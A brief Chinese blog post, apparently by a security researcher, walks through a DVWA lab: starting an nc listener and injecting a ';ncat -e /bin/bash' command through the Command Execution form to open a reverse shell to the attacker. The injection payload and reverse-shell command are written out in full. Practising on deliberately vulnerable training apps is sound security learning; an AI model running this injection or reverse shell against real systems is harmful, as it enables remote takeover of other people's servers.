碳基体

奋斗在产品安全第一线的安全妹子

用DVWA命令行注入实验nc反弹shell


第一步:在攻击者电脑上使用nc在1234端口开启一个监听

root@bt:~# nc -n -v -l -p 1234
Ncat: Version 6.26SVN ( http://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234


第二步:访问 DVWA(受害者电脑上搭建)  的Command Execution示例中输入

;ncat -e /bin/bash (攻击者ip) 1234


点击提交,攻击者获得受害者的一个webshell,

 




来源:碳基体

评论